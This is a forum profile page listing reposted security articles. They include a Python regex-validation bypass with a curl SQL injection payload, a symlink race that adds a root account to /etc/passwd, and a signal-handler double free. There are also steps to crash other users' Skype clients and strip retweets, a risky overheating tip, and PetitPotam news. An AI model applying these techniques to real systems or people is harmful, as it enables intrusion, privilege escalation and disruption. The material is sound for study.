Jump to content

Nytro

Administrators
  • Posts

    18036
  • Joined

  • Last visited

  • Days Won

    476

Nytro last won the day on June 11

Nytro had the most liked content!

Reputation

4823 Excellent

About Nytro

  • Rank
    Administrator
    Enthusiast
  • Birthday 03/11/1991

Recent Profile Visitors

41529 profile views
  1. Nu prea ai ce sa faci daca functionalitatea programului nu permite activarea licentei. Poti incerca sa dai ceasul cu cativa ani inapoi dar sunt slabe sanse sa functioneze (ulterior il dai inapoi). O versiune mai noua a programului nu si-ar face treaba? Poate poti discuta cu producatorul sa iti dea una noua
  2. Daca vrei sa rulezi nu stiu ce bot de crypto, nu cred ca trebuie sa iti faci griji ca NSA-ul a pus ceva backdoor acolo, nu prea o sa ii pese daca nu esti cine stie ce persoana importanta la nivel mondial (e.g. directorul unei centrale nucelare din Iran). Ca sa o securizezi e destul de simplu: 1. Faci update cat se poate de des 2. Nu instalezi toate mizeriile 3. Scoti lucrurile de care nu ai nevoie, precum servicii pe care nu le foloseti 4. Lasi doar SSH, auth cu cheie si gata 5. Poti face multe lucruri de hardening dar nu prea ai nevoie Daca vrei, poti verifica o distributie de Linux si poti fi sigur ca nu are niciun backdoor, doar ca va dura cateva mii de ani: 1. Iei tot codul sursa si il compilezi 2. Face reproductible build daca se poate, daca nu faci diff-uri intre ce ai tu pe distributie si ce se compileaza 3. Verifici toate diferentele (o sa fie) datorate unor patch-uri, modificari sau configurari 4. Verifici tot codul sursa de la kernel la toate programele instalate si vezi sa nu aiba backdoor 5. Bonus: Cauti si vulnerabilitati cand faci asta Acum mai serios, nu prea ai ce face tu, o persoana, individual. Daca s-ar aduna cateva mii de persoane s-ar putea face asa ceva dar tot ar dura luni sau chiar ani (fara sa se faca vreo actualizare in acest timp). Cat despre distributia respectiva, nu am auzit de ea, de ce ai ales-o? De ce nu ceva "clasic": debian, centos, ubuntu, kali etc.?
  3. Registry Explorer Replacement for the Windows built-in Regedit.exe tool. Improvements over that tool include: Show real Registry (not just the standard one) Sort list view by any column Key icons for hives, inaccessible keys, and links Key details: last write time and number of keys/values Displays MUI and REG_EXPAND_SZ expanded values Full search (Find All / Ctrl+Shift+F) Enhanced hex editor for binary values Undo/redo Copy/paste of keys/values Optionally replace RegEdit more to come! Build instructions Build the solution file with Visual Studio 2022 preview. Can be built with Visual Studio 2019 as well (change toolset to v142). Sursa: https://github.com/zodiacon/RegExp
  4. A Python Regular Expression Bypass Technique One of the most common ways to check a user's input is to test it against a Regular Expression. The Python module RE provides easy and very powerful functions to check if a particular string matches a given regular expression (or if a given regular expression matches a particular string, which comes down to the same thing). Sometimes, functions included in Python RE are either misused or not very well understood by developers and when you see this it can be possible to bypass weak input validation functions. TL;DR using python re.match() function to validate a user input can lead to bypass because it will only match at the beginning of the string and not at the beginning of each line. So, by converting a payload to multiline, the second line will be ignored by the function. This means that a weak validation function that prevents using special characters in a value (for example id=123), could be bypassed with something like id=123\n'+OR+1=1--. In this article I'll show you an example of bad usage of the re.match() function. [from search() vs. match()] Python offers two different primitive operations based on regular expressions: re.match() checks for a match only at the beginning of the string, while re.search() checks for a match anywhere in the string (this is what Perl does by default). For example: 1 >>> 2 >>> re.match("c", "abcdef") # No match 3 >>> re.search("c", "abcdef") # Match 4 <re.Match object; span=(2, 3), match='c'> Regular expressions beginning with '^' can be used with search() to restrict the match at the beginning of the string: 1 >>> 2 >>> re.match("c", "abcdef") # No match 3 >>> re.search("^c", "abcdef") # No match 4 >>> re.search("^a", "abcdef") # Match 5 <re.Match object; span=(0, 1), match='a'> As you can see, the first re.match didn't match because implicit anchors. Anchors do not match any character at all. Instead, they match a position before, after, or between characters. They can be used to “anchor” the regex match at a certain position (https://www.regular-expressions.info/anchors.html). Input Validation using re.match() Let say that I've got a Python flask web application that is vulnerable to SQL Injection. If I send an HTTP request for /news sending an article id number on the id argument, and a category name on the argument category, it returns me the content of that article. For example: 1 from flask import Flask 2 from flask import request 3 import re 4 5 app = Flask(__name__) 6 7 def is_valid_input(input): 8 m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE) 9 if m is not None: 10 return False 11 return True 12 13 @app.route('/news', methods=['GET', 'POST']) 14 def news(): 15 if request.method == 'POST': 16 if "id" in request.form: 17 if "category" in request.form: 18 if is_valid_input(request.form["id"]) and is_valid_input(request.form["category"]): 19 return f"OK: {request.form['category']}/{request.form['id']}" 20 else: 21 return f"Invalid value: {request.form['category']}/{request.form['id']}", 403 22 else: 23 return "No category parameter sent." 24 else: 25 return "No id parameter sent." By sending a request with id=123 and category=financial the application reply me with "200 OK" status code and "OK: financial/123" response body. As I said, the argument id is vulnerable to SQL Injection, so the developer has fixed it by creating a function to validate the user's input on both arguments (id and category) that prevents sending some characters like single and double quotes or strings like "select" or "union". As you can see, this webapp checks the user's input with the is_valid_input function at line 7: 1 def is_valid_input(input): 2 m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE) 3 if m is not None: 4 return False 5 return True the code above means: "if the value of any input contains double quote, or single quote, or semicolon, or equal character, or any of the following string: "select", "union", "from", "where", then discard it". Let's try it: By trying to inject SQL syntax on the value of argument id the webapp returns a 403 Forbidden status with "Invalid value" as response body. This thanks to the validation function that matches invalid characters in my payload such as single quote and equal. Input Validation Bypass From the RE module documentation, about the re.match() function: "... even in MULTILINE mode, re.match() will only match at the beginning of the string and not at the beginning of each line. If you want to locate a match anywhere in string, use search() instead (see also search() vs. match())." So, to bypass this kind of input validation we just need to convert the SQL Injection payload from single line to multiline by adding a \n between the numeric value and the SQL syntax. For example: If the question is "can SQL have a newline inside a SELECT?" the answer is yes it can. The hypothetical SQL syntax becomes something like the following: Let's do it on the vulnerable webapp: As shown in the screenshot, I just put a \n (not CRLF \r\n) after the id value and then I started my SQL Injection. The validation function just validate the first line, so I bypassed it. Using curl: curl -s -d "id=123%0a'+OR+1=1--&category=test" 'http://localhost:5000/news' OK: test/123% Run it in your Lab First, download the vulnerable flask webapp source code from here: from flask import Flask from flask import request import re app = Flask(__name__) def is_valid_input(input😞 m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE) if m is not None: return False return True @app.route('/news', methods=['GET', 'POST']) def news(): if request.method == 'POST': if "id" in request.form: if "category" in request.form: if is_valid_input(request.form["id"]) and is_valid_input(request.form["category"]): return f"OK: {request.form['category']}/{request.form['id']}" else: return f"Invalid value: {request.form['category']}/{request.form['id']}", 403 else: return "No category parameter sent." else: return "No id parameter sent." view rawapp.py hosted with ❤ by GitHub then start flask webserver with: flask run Remediation First option is to do a positive validation instead of a negative one. Don't create a sort of deny-list of "not allowed words" or "not allowed characters" but check for expected value format. Example id=123 can be validated by ^[0-9]+$. Second option is to use re.search() instead of re.match() that check over the whole value and not just for the first line. Third option: don't create your own input validation function but try to find a widly used and mantained library that does it for you. Follow if you liked this post, follow me on twitter to keep in touch! https://twitter.com/AndreaTheMiddle Sursa: https://www.secjuice.com/python-re-match-bypass-technique/
  5. Winning the race: Signals, symlinks, and TOC/TOU Date: 23rd Jun 2021Author: uid00 Comments Introduction: So, before we dive right into things, just a few bits of advice; some programming knowledge, an understanding of what symbolic linking is within *nix and how it works, and also an understanding of how multi-threading and signal handlers work would be beneficial for readers to understand the concepts I’m going to be covering here, but if you can’t code then don’t worry as I’m sure you’ll still be able to grasp the concepts that I’m covering. That being said, having prior programming knowledge should give you a deeper understanding of how this actually works. It won’t kill you to read up on the subjects I just mentioned, and by you doing so, you will understand this tutorial a lot easier. Ideally, if you understand C/C++ and Assembly language, then you should be able to pick up the concept of a practical (s/practical/exploitable) race condition bug relatively easily. Knowing your way around a debugger would also help. Not all race conditions are vulnerabilities, but many race conditions can lead to vulnerabilities taking place. That being said, when vulnerabilities do happen to arise as a result of race condition bugs, they can be extremely serious. There have been cases in the past where race condition flaws have affected national critical infrastructure, in one case even directly contributing to the deaths of multiple people (No Kidding!) Generally, within multi-threading, race conditions aren’t an issue in terms of exploitability but rather just an issue in terms of the intended program flow not going as planned (note ‘generally’, there can be exceptions where this can be used for exploitation rather than being a mere design issue). Anyway, before getting into specific kinds of race condition bugs, it should be noted that these bugs can exist in anything from a low-level Linux application to a multi-threaded relational DBMS implementation. In terms of paradigm, if your code is purely functional (I’m talking in terms of paradigm here, although I guess that particular use of terminology is interchangeable as if your code suffers from race condition flaws then it lacks functionality in the non-paradigm sense too) then race conditions will not occur. So, what exactly are race conditions? Let’s take a moment to sit back and enter the land of imagination. For the sake of this post, let’s pretend you’re not a fat nerd sitting in your Mom’s basement living off of beer and tendies while making sweet sweet love to your anime waifu pillow. Lets imagine, just for one moment, that you’re someone else. You’re not just any old someone, no. You’re someone who does something important. You’re a world-class athlete. You spent the last 4 years training non-stop for the 100m Sprint, you are certain you are going to win the Gold Medal this year. The time finally comes. you are ready to race. During the sprint, you’re neck-to-neck with Usain Bolt, both inches away from the finish line. By sheer chance, you both pass over the finish line at the exact same moment. The judges replay the footage in slow-motion to see who passed the finish line first, and unbelievably, you both passed the finish line at the exact same moment, down to the very nanosecond! Now the judges have a problem. Who wins Gold? You? Usain Bolt? The runner-up who crossed the line right after you two? What if nobody wins? What if you’re both given Gold, decreasing the subjective value of the medal? What if the judges call off the event entirely? What if they demand a re-match? What if a black hole suddenly spawns in the Olympic arena and causes the entire solar system to implode? Who the hell knows, right? Well, welcome to the wild and wacky world of race conditions! This is Part One of a Three-Part series diving into the subject of race conditions, there’s absolutely no way I can cover this whole subject in three blog posts. Try three books maybe! Race Conditions are a colossally huge subject with a wide variety of security implications ranging from weird behaviour that poses no risk at all, to crashing a server, to full-blown remote command execution! Due to the sheer size of this topic, I suggest doing research in your own time between reading each part of this tutorial series. While at first it might seem intimidating, this is actually a very simple concept to grasp (exploiting it on the other hand is a bit more hit and miss, but I’ll get into that later). Race conditions stem from novice developers making the assumption that their code will execute in a linear fashion, or as a result of developers implementing multi-threading in an insecure manner. If their program then attempts to perform two or more operations at the same time then this can cause changes within the code flow of the program to end with undesirable results (or desirable, depending on whether you’re asking the attacker or the victim!). It should also be noted (as stated before) that race conditions aren’t necessarily always a security risk, in some cases they can just cause unexpected behaviour within the program flow while leading to no actual risk. Race conditions can occur in many different contexts, even within basic electronics (and biology! Race Conditions have been observed within the brains of live rats). I will be covering race conditions from an exploitation standpoint, and I will mainly be talking about race conditions within web applications or within vulnerable C programs. The basic premise of a race condition bug is that two threads to “race” against eachother, allowing the winner of said race to manipulate the control flow of the vulnerable application. I’ll be touching lightly upon race conditions being present in multi-threaded applications and will give some brief examples, but this will mainly be focused on races as a result of signal handling, faulty access checks and symlink tricks. In addition to that, I’ll give some examples of how this class of bugs can be abused within Web applications. Race conditions cover such a broad spectrum that I simply cannot discuss all of it within one blog post, so I’ll give a quick overview of the basics, which hopefully you can build upon with your own research. To give you a more simple analogy of what a race condition is, imagine you have online banking with a banking platform. Let’s assume you open two separate browser tabs at once, both with the payment page loaded, you then setup both browser tabs so that you’re ready to make your payment to another bank account —  if you were to then click the button to make the payment in both tabs at identical times, it could register that only one payment had been made, when in reality the payment had been made twice but only the money for one of the payments has been deducted from your bank balance. This is a very basic analogy of how a race condition could take place, although this is highly unlikely to ever happen in a real world scenario. I’m going to demonstrate some code snippets to explain this, in order to show different kinds of races that are possible and give examples in various languages, but I’ll start pseudo-code : The code above is C-inspired pseudo-code The reason I gave the first example in C is because race conditions tend to be very common within vulnerable C applications. Specifically you should be looking for the signal.h header as this is generally a good indicator of a potential race condition bug being present within issues regarding signal handling at least). Another good indicator is if there are access checks present for files as this can often lead to symlink races taking place (I will demonstrate this shortly). I will give other examples in other languages, and explain context-specific race condition bugs associated with such languages. While this code above is clearly not a working example, it should allow me to illustrate the concept of race conditions. Lets assume an attacker sends two operations to the program at the same time, and the code flow states that if permitted, then execute the specified function. If timed correctly, an attacker could make it so that something is permitted at the time of check, but that thing may no longer be permitted at the time of use (this would be a TOC/TOU race — meaning “Time of Check / Time of Use”). So for example, we can assume that the following test is being ran: if (something_is_permitted) // check if permitted and the conditions for the if statement are met and the code flow will continue in the intended order, but when the function gets called, the thing that was not permitted is now considered to be permitted, so it will execute the following code: doThis(); This will result in unintended program flow and depending on the nature of the code it could allow an attacker to bypass access controls, escalate privileges, cause a denial of service, etc. The impact of race condition bugs can vary greatly, ranging from a petty nuisance to critical exploits resulting in the likes of remote root. I’ll begin by describing various types of race conditions and methods of triggering them, before moving on to some real-world examples of race conditions and an explanation of how they can be tested for within potentially vulnerable web applications. When most people think of Race Conditions, they imagine them to be something very fast-paced. People expect the timing required to execute a TOC/TOU race would need to be extremely precise. While this is often the case, it is not always the case. Consider the following example of a “slow-paced” race condition bug: There exists a social-networking application where users have the ability to edit their profile A user clicks the “edit profile” button and it opens up the webpage to allow them to make edits User then goes AFK (Away from Keyboard) The administrator finds an unrelated vulnerability in the profile editing section of the website, and as a result, locks down the edit functionality so that users can no longer edit their profile User returns, and still has the profile editing page open in a browser tab Despite new users not being able to access the “edit profile” page, this user already has the page opened and can continue to make edits despite the restriction put in place by the administrator Race Conditions can also take place as a result of latency within networks. Take an IRC for example, let’s assume that there is a hub and two linked nodes. Bob wants to register the channel #hax yet Alice also wants to register this same channel. Consider the following: Bob connects to IRC from node #1 Alice connects to the IRC from node #2 Bob runs /join #hax Alice runs /join #hax Both of these commands are ran from separate nodes at around the same time Bob becomes an operator of #hax Alice becomes an operator of #hax The reasoning for this, is, due to network latency, node #1 would not have time to send a signal to node #2 to alert it that the Services Daemon has already assigned operator status to another user on the same network. (PROTIP: When testing local desktop applications for Race Conditions - for example a compiled binary - use something like GDB or OllyDBG to set a breakpoint between TOC and TOU within the source code of the binary you are debugging. Execute your code from the breakpoint and take note of the results in order to determine any potential security risk or lack thereof. This is for confirmation of the bug only, and not for actual exploitation. As the saying goes, PoC||GTFO. This rings especially true with race conditions considering some of them are just bugs or glitches or whatever you wanna call them, as opposed to viable exploits with real attack value. If you cannot demonstrate impact, you probably should not report it) Symlinks and Flawed access checks: Using symlinks to trigger race conditions is a relatively common method. Here I will give a working example of this. The example will show how a symlink race can be used to exploit a badly implemented access check in C/C++ — this would allow an attacker to horizontally perform privilege escalation in order to get root on a server (assuming the server had a program that was vulnerable in this manner) — it should be noted that while writing to /etc/passwd in the manner I’m about to demonstrate will not work on newer operating systems, these methods can still be used to obtain read (or sometimes write) perms to root-owned files that generally would not be accessible from a regular user account. This method assumes that the program in question is being ran with setuid access rights. The intended purpose of the program is that it will check whether you have permissions to write to a specific directory (via an access(); check) — if you have permission, it will write your user input to the directory of choice. If you don’t have permission, then the access(); check is intended to fail, indicating that you’re attempting to write to a directory or file of which you lack the permissions to write to. For example, the /tmp directory is world-writeable, whereas a directory such as /etc would require additional permissions. The goal of an attacker here is to abuse symbolic linking to trick the program into thinking it is writing to /tmp where it has permission, when in fact it is writing to /etc where it lacks permissions In modern Linux Distributions (and in modern countermeasures implemented into languages such as C), there are ways of attempting to mitigate such an attack. For example, the POSIX C stdlib can use the mkstemp(); function as opposed to fwrite(); or fopen(); in order to create temporary files, and respectively mktemp(1) allows for creation of temporary files within *nix-based systems. Another attempt at mitigating this in *nix-based systems is the O_NOFOLLOW flag for open() calls — the purpose of this flag is to prevent files being opened by a symbolic link. Take a look at the following vulnerable code (this is a race condition between the original program and a malicious one which will be used): Example suid program vulnerable to a typical TOC/TOU symlink race condition through means of an insufficient access check. I will be compiling and running this from my user account with the following privs (non-root): First, I will demonstrate this using a debugger (GBD, although others such as OllyDbg will suffice too) because it allows you to pause the execution of the program allowing for race conditions to take place easier — in a real exploitation scenario you would need to trigger the race condition naturally which i will demonstrate next. First, disassemble the code using your debugger of choice: Now, set a breakpoint at fopen(); so we can demonstrate a race condition without actually having to go through the steps to trigger one naturally: break *0x80485ca Then replace the written file via a symbolic link like so: Now that you’ve paused the execution of the program flow through use of a breakpoint, resuming the program flow (after the symlink has been made) would cause the access check to be passed, meaning the program would continue to run as intended and would write some input to the file that would usually only be writeable had the access check been passed. Of course, using GDB or another debugger isn’t possible in real world scenarios, therefore it is relevant to implement something that will allow the race conditions to take place naturally (instead of setting a breakpoint and pausing the program execution with a debugger to get the timing right). One way of doing this is by repeatedly performing two options at the same time, until the race conditions are met. The following example will show how the access check in the vulnerable C program can be bypassed as a result of two bash scripts running simultaneously. Once the race condition is successfully met, it will result in the access check being passed and will write a new entry to /etc/passwd Script #1: This script should be running repeatedly until the condition is met, that’s why it is re-executing itself within the while loop Script #2: This script will repeatedly be attempting to make a symbolic link to /etc/passwd After a while of both of these script running at the same time, it should eventually get the timing correct so that the symbolic link is made prior to completion of the access check, causing the access check to be bypassed and some data to be written to a previously restricted file (/etc/passwd in this case) If all goes to plan, an attacker should be able to write a new entry to /etc/passwd with root privs: raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh From here, they can simply use ‘su’ in order to authenticate as a root user with the new ‘raceme’ account that they have created by adding an entry to /etc/passwd g0t r00t!! Race Conditions within Signal Handling: If you do not understand the concept of Signal Handlers within programming then now is probably a good time to become familiar with the subject, as it is one of the primary causes of race condition flaws. The most common occurrence of race conditions within Signal Handlers is when the same function installed as a signal handler is utilized for the handling of multiple different signals and when those different signals are called via the same signal handling function within a short time-frame of eachother (hence the race condition). “Non-Reentrant” Signals are the primary culprit that result in signal-based races posing an issue. If you’re unfamiliar with what the concept of non-reentrance is within Signal Handling, then I really do suggest reading into the topic in-depth, but if you’re like me and have a TL;DR attitude and just wanna go hack the planet already, then I will offer a short and sweet explanation (the terminology used to describe it alone is somewhat self-explanatory in all honesty). If a function has been installed with signal handling operations in mind, and if aforementioned function either maintains an internal state or calls another function that maintains an internal state then its a non-reentrant function and this means it has a higher probability of a race condition being a possibility. For an example demonstrating exploitability of race condition bugs associated with signal handlers, I will be using the free(); function (associated with dynamic memory allocation in C/C++) to trigger a traditional and well-known application-security flaw referred to as a “double free”. The following code examples shows how an attacker could craft a specifically timed payload – If you’re not spotting their common trend here, race conditions are all about timing. Generally attackers will have their payloads running concurrently in a for/while loop, or they’ll create a ghetto-style “loop” of sorts by having payload1.sh repeatedly execute payload2.sh which in turn will repeatedly execute payload1.sh and so on and so on. The reasoning for this is because in many contexts, for a race condition to be successful, the requests need to be made concurrently sometimes even down to the exact millisecond. Rather than executing their payload once and hoping they got their one-in-a-million chance of getting the timing exactly right it makes far more sense to use a loop to repeatedly execute the payload, as with each iteration of the loop, the attacker has another chance of getting the timing right. Pair this with methods of slowing down execution of certain processes and now the attacker has increased their window (the “window” in this instance referring to the viable time in which the race condition can occur, allowing the attack to be carried out). For example with a TOC/TOU Race, the “attack window” would be the time between the check taking place (hence “TOC” – “Time of Check”), and the timee when the action occurs (“TOU” – “Time of Use”) between the check being carried out again. The “attack window” in this instance is the time frame in which the check being carried out is saying that the actual occurring is permitted, which for a very short time period (or “window”) it is permitted… up until the iteration wherein the next check occurs, when the action is there no longer permitted meaning the window has closed. maximising the window in which the attack can be carried out by slowing down particular aspects of program/process execution (I cover methods of doing this in a chapter here) making as many concurrent attempts at triggering the race within the time-frame dictated by the length of your attack window. Use multiple threads where possible. Testing manually with a debugger via setting breakpoint between TOC and TOU Having lots of processing power available to make as many concurrent requests as possible during your attack window (while using the methods I describe to slow down other elements of process execution at the same time) Below you can find an example of a Race Condition present via signal handling, with triggering of a double free as a Proof-of-Concept. This code example uses the same signal handler function which is non-reentrant and makes use of a shared state. The function in question is the free(); function, and in this code example an attacker could send two different signals to the same signal handler at the same time, resulting in memory corruption taking place as a direct result of the race condition itself. If you have experience with C/C++ and dynamic memory allocation then you’re probably aware of the issues posed by a double free triggered as a result of calling free(); twice with the same argument. For those who are not aware, this is known as a “double free bug” and it results in the programs memory structures becoming corrupted which can cause a multitude of problems ranging from segfaults and crashes, to arbitrary code execution as a result of the attacker being able to control the data written into the memory region that has been doubly-allocated, resulting in a buffer overflow taking place. While the RCE triggered by the overflow which in turn was triggered by the double free… the double free itself is triggered as a restult of a race condition occuring due to two separate signals being sent to the free(); signal handler, which, withou getting overly technical, essentially makes malloc(); throw a hissy-fit and poop its pants. The following code demonstrates this issue: #include <stdio.h> #include <vulnerable.lol> #define RACE_CONDITION LOL void vuln(int pwn) { // some lame program free(globvar); free(globvar2); // double free } int main(int argc,char* argv[]) { // overflowz and code exec signal(SIGHUP,vuln); signal(SIGTERM,vuln); // all due to a pesky race condition } There are a number of reasons why signal handling can result in race conditions, although using the same function as a handler for two or more separate signals is one of the primary culprits. Here is a list of reasons as to what could trigger a race condition via signal handling (from Mitre’s CWE Database): Shared state (e.g. global data or static variables) that are accessible to both a signal handler and “regular” code Shared state between a signal handler and other signal handlers Use of non-reentrant functionality within a signal handler – which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution. Association of the same signal handler function with multiple signals – which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses. Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are not any concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses. Out of everything just listed, the most common reasons are either one signal handler is being used for multiple signals, or two or more signals arrive in short enough succession of eachother to fit the attack window for a TOCTOU race condition. Methods of slowing down process execution: Slowing down the execution process of the program is almost vital to effectively achieve race conditions more consistently, here I will describe somethe common methods that can be used to achieve this. Some of these methods are outdated and will only work on older sytems, but they are still worth including (especially if you’re into CTF’s) Deep symlink nesting (as described above) is one old method that can be used to slow down program execution in order to aid race conditions. Another method that can be used is by changing the values for the environment variable LD_DEBUG — setting this to a different value will result in output being sent to stderr, if you were to then redirect stderr to a pipe, it can slow down or completely halt the setuid bin in question. To do this you would do something as follows: LD_DEBUG=all;some_program 2>&1 Usage of LD_DEBUG is somewhat outdated, no longer relevant within setuid binaries since the upgrade to glibc 2.3.4 — that being said, this can still be used for some more esoteric bugs affecting legacy systems, and is also occasionally seen as solutions for CTF’s Another method of slowing down program execution is by lowering its scheduling priority through use of the nice or renice commands. Technically, this isn’t slowing down the program execution as such, but it’s rather forcing the Linux scheduler to allocate less time frames towards the execution of the program, resulting in it running at a slower rate. It should also be noted that this can be achieved within code (rather than as a terminal command) through use of the nice(); syscall. If the value for nice is a negative value, then the process will run with higher priority. If it is a positive value, then the process will run with lower priority. For example, setting the following value will cause the process to run at a ridiculously slow rate: nice(19) If you’re familiar with writing Linux rootkits, then you may already be aware of these methods, but you can use dynamic linker tricks via LD_PRELOAD in order to slow down the execution of processes too. This can be done by hooking common functions such as malloc(); or free(); then once said functions are called within the vulnerable program, their speed of execution will be slowed down to a nominal extent. One extremely trivial way of slowing down the execution of a program is to simply run it within a virtualized environment. If you’re using a virtual machine, then there should be options available that will allow you to limit the allocated amount of CPU resources and RAM, allowing you to test the potentially vulnerable program in a more controlled environment where you can slow things down with ease and with a lot of control. This method will only work while testing for certain classes of race conditions. One crude method to slow down program/process executioon speeds in order to increase the chance of a race condition occuring is taking physical measures to overheat your computer, putting strain on its ability to perform computational tasks. Obviously, this is dangerous for the health of your device so don’t come crying to me if you wind up breaking your computer. There are many ways to do this, but the way I’ve seen it done (which is, according to my crazy IRL hacker friend) is supposedly one of the safer methods of physically overheating your computer — simply wet a towel (or a bunch of towels) and wrap them around your device while making sure than the fan in particular is covered completely. Deep symlinks can also be used to slow down the execution of the program, which is extremely valuable while attempting to exploit race conditions. This is a very old and well-documented method, although these days it is practically useless (unless you’re exploiting some old obscure system, or if you’re doing it for a CTF — I have seen this method utilized in CTF challenges before). Since Linux Kernel 2.4x, this method has been mitigated through implementation of a limit on the maximum number of symlink dereferences permitted during lookups alongside limits on nesting depths. Despite this method being practically dead, I figured it’s still worth covering because there are still some obscure cases where this can be utilized. below is a script written by Rafal Wojtczuk demonstrating how this can be done (the example shown here can be found at Hacker’s Hut😞 This will cause the kernel to take a ridiculously long length of time to access a single file, here is the situation presented when the above script is executed: drwxr-xr-x 2 aeb 4096 l lrwxrwxrwx 1 aeb 53 l0 -> l1/../l1/../l1/../l/../../../../../../../etc/services lrwxrwxrwx 1 aeb 19 l1 -> l2/../l2/../l2/../l lrwxrwxrwx 1 aeb 19 l2 -> l3/../l3/../l3/../l lrwxrwxrwx 1 aeb 19 l3 -> l4/../l4/../l4/../l lrwxrwxrwx 1 aeb 19 l4 -> l5/../l5/../l5/../l drwxr-xr-x 2 aeb 4096 l5 Depending on how many parameters are passed to the above bash script, the larger the depth of the symlinks, meaning it can take days or even weeks for the one process to finish completion. On older machines, this will result in application-level DoS. There are many other ways in which symbolic links can be abused in order to achieve race conditions, if you want to learn more about this then I’d suggest googling as there’s simply too much to explain in a single blog post. Yet another method to slow down program execution is by increasing the timer interrupt frequency in order to force more load onto the kernel. Timer Interrupts within the Linux Kernel have a long and extensive history, so I will not be going in-depth here. In part 2 of this tutorial series you can expect many more advanced methods to slow down process execution. Final notes (and zero-days): I intentionally chose to leave out a number of methods for testing/exploiting race condition bugs within web applications, although I’ll be covering these in-depth in Part 2 of my race condition series. Meanwhile, I’ll give you an overview of what you can expect with Part 2, while also leaving you two race condition 0day exploits to (ethically) play around with. The second part of my tutorial series regarding race conditions is going to have a primary emphasis on race conditions in webapps, which I touched upon lightly in this current post. This post was my attempt at explaining what race conditions are, how they work, how to (ab)use them, and the implications of their existence in regards to bug bounty hunting. Now that I’ve covered what these bugs are and also provided a few examples of real working exploits demonstrating that race conditions do indeed exist within webapps, I’m going to be spending most of part two covering the following three areas: More advanced techniques of identifying race conditions specifically within web applications, methods of bypassing protections against this, lucrative sections of webapps to test in order to increase your chances at finding race condition bugs on a regular basis within web applications. More advanced (and several private) techniques used to slow down process execution, both within regular applications and within web applications (although mostly with emphasis on web applications since that will be the primary theme of Part 2 of this series), and how to use some practical dynamic linker tricks through hooking of (g)libc functions via LD_PRELOAD in userland/ring3, exactly like you would do with a rootkit, but with emphasis on using this to slow down program/process execution due to added strain on hooked common functions, as opposed to use of dynamic linker for stealth-based hooking. We are talking about exploiting race conditions here, not writing rootkits — so while some of these techniques are kind-of interchangeable, the methods I’ll be sharing would be very inefficient for an LD_PRELOAD based rootkit as it would make the victim’ machine slow as shit. For maintaining persistence on a hacked box, this is terrible, but for slowing down process execution to increase the odds of a race condition, this is great! You can expect me to expand upon dozens of methods of slowing down process execution to increase your odds of winning that race! Finally, just like this first part of my race condition exploitation series, I’ll be setting a trend by once again including two new zero-day exploits which are both race condition bugs. Skype Race Condition 0day: Create a Skype group chat Add a bunch of people Make two Skype bots and add them to the chat Have one bot repeatedly set the topic to ‘lol’ (lowercase) Have the other bot repeatedly set the topic to ‘LOL’ (uppercase) example, bot #1 repeatedly sends “/topic lololol” to the chat and bot #2 repeatedly sends “/topic LOLOLOL” If performed correctly, this will break the Skype client for everyone in the group chat. Every time they reload Skype, it will crash. It also makes it impossible for them to leave the group chat no matter what they try. The only way around this is to either create a fresh Skype account, or completely uninstall Skype, access skype via web (web.skype.com) to leave the group, and then reinstall Skype again. Twitter API TOC/TOU Race Condition 0day: There was a race condition bug affecting twitter’s API. This is a generic TOC/TOU race condition which allows various forms of unexpected behaviour to take place. By sending API requests concurrently to Twitter, it can result in the deletion of other people’s likes/retweets/followers. You would write a script with multiple threads, some threads sending an API request to retweet or like a tweet (from a third-party account), and the other threads simultaneously removing likes/RT’s from the same tweet from the same third-party account, once again making a request t Twitter’s API in order to do so. As a result of the Race Condition taking place, this would remove multiple likes and retweets from the affected post, rather than only the likes and retweets set to be removed via the API requests sent from the third-party account. While this has no direct security impact, it can drastically affect the outreach of a popular tweet. While running this script to simultaneously send the API requests from a third-party account, we managed to reduce a tweet with 2000+ Retweets down to 16 Retweets in a matter of minutes. The Proof-of-Concept code for this will be viewable within the “Exploits and Code Examples” section of the upcoming site of 0xFFFF where we plan to eventually integrate this blog. To see how this works in detail, you can read the full writeup here, published by a member of our team. That’s all for now — part two will be coming soon with more zerodays and a much bigger emphasis on exploitation of race condition bugs within web applications. Sursa: https://blog.0xffff.info/2021/06/23/winning-the-race-signals-symlinks-and-toc-tou/
  6. New PetitPotam NTLM Relay Attack Lets Hackers Take Over Windows Domains July 26, 2021 Ravie Lakshmanan A newly uncovered security flaw in the Windows operating system can be exploited to coerce remote Windows servers, including Domain Controllers, to authenticate with a malicious destination, thereby allowing an adversary to stage an NTLM relay attack and completely take over a Windows domain. The issue, dubbed "PetitPotam," was discovered by security researcher Gilles Lionel, who shared technical details and proof-of-concept (PoC) code last week, noting that the flaw works by forcing "Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function." MS-EFSRPC is Microsoft's Encrypting File System Remote Protocol that's used to perform "maintenance and management operations on encrypted data that is stored remotely and accessed over a network." Specifically, the attack enables a domain controller to authenticate against a remote NTLM under a bad actor's control using the MS-EFSRPC interface and share its authentication information. This is done by connecting to LSARPC, resulting in a scenario where the target server connects to an arbitrary server and performs NTLM authentication. "An attacker can target a Domain Controller to send its credentials by using the MS-EFSRPC protocol and then relaying the DC NTLM credentials to the Active Directory Certificate Services AD CS Web Enrollment pages to enroll a DC certificate," TRUESEC's Hasain Alshakarti said. "This will effectively give the attacker an authentication certificate that can be used to access domain services as a DC and compromise the entire domain. While disabling support for MS-EFSRPC doesn't stop the attack from functioning, Microsoft has since issued mitigations for the issue, while characterizing "PetitPotam" as a "classic NTLM relay attack," which permit attackers with access to a network to intercept legitimate authentication traffic between a client and a server and relay those validated authentication requests in order to access network services. "To prevent NTLM Relay Attacks on networks with NTLM enabled, domain administrators must ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) or signing features such as SMB signing," Microsoft noted. "PetitPotam takes advantage of servers where the Active Directory Certificate Services (AD CS) is not configured with protections for NTLM Relay 